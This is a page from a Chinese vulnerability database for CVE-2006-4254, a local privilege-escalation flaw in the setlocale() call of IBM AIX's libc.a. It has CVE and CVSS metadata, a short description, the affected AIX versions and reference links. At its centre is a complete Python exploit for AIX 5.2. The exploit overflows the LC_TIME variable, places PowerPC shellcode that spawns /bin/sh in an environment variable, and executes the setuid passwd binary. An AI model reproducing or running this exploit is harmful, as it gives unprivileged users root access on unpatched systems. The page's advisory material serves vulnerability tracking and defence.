IBM AIX 'libc.a' 文件中的setlocale()调用

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1113915 漏洞类型 Unknown
发布时间 2007-11-07 更新时间 2009-06-02
CVE编号 CVE-2006-4254 CNNVD-ID CNNVD-200608-313
漏洞平台 AIX CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/4612
https://www.securityfocus.com/bid/19578
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200608-313
|漏洞详情
IBMAIX是一款商业性质的UNIX操作系统。AIX的libc.a文件中的setlocale()调用实现上存在漏洞,本地攻击者可以利用其中的漏洞实现权限的提升。
|漏洞EXP
#
#setlocale() exploit for aix 5.2 ( CVE-2006-4254  )
#thomas.pollet@gmail.com
#
from os import execve

bof="a"*580+"bbbbccccdddd\x2f\xf2\x28\x2f"
egg="\x60"*2350
shellcode=(            # by intropy <at> caughq.org
"\x7c\xa5\x2a\x79"     # xor.    r5,r5,r5
"\x40\x82\xff\xfd"     # bnel    <shellcode>
"\x7f\xe8\x02\xa6"     # mflr    r31
"\x3b\xff\x01\x20"     # cal     r31,0x120(r31)
"\x38\x7f\xff\x08"     # cal     r3,-248(r31)
"\x38\x9f\xff\x10"     # cal     r4,-240(r31)
"\x90\x7f\xff\x10"     # st      r3,-240(r31)
"\x90\xbf\xff\x14"     # st      r5,-236(r31)
"\x88\x5f\xff\x0f"     # lbz     r2,-241(r31)
"\x98\xbf\xff\x0f"     # stb     r5,-241(r31)
"\x4c\xc6\x33\x42"     # crorc   cr6,cr6,cr6
"\x44\xff\xff\x02"     # svca
"/bin/sh"
"\x05")

execve("/usr/bin/passwd",[""],{"EGG":egg+shellcode,"LC_TIME":bof})

# milw0rm.com [2007-11-07]
|受影响的产品
IBM AIX 5.3 IBM AIX 5.2 IBM AIX 5.1
|参考资料

来源:BID
名称:19578
链接:http://www.securityfocus.com/bid/19578
来源:SECTRACK
名称:1016712
链接:http://securitytracker.com/id?1016712
来源:SECUNIA
名称:21541
链接:http://secunia.com/advisories/21541
来源:AIXAPAR
名称:IY88528
链接:http://www-1.ibm.com/support/search.wss?rs=0&q=IY88528&apar=only
来源:AIXAPAR
名称:IY88512
链接:http://www-1.ibm.com/support/search.wss?rs=0&q=IY88512&apar=only
来源:AIXAPAR
名称:IY88183
链接:http://www-1.ibm.com/support/search.wss?rs=0&q=IY88183&apar=only
来源:aix.software.ibm.com
链接:ftp://aix.software.ibm.com/aix/efixes/security/README
来源:XF
名称:aix-setlocale-privilege-escalation(28482)
链接:http://xforce.iss.net/xforce/xfdb/28482
来源:OSVDB
名称:27996
链接:http://www.osvdb.org/27996
来源:VUPEN
名称:ADV-2006-3327
链接:http://www.frsirt.com/english/advisories/2006/3327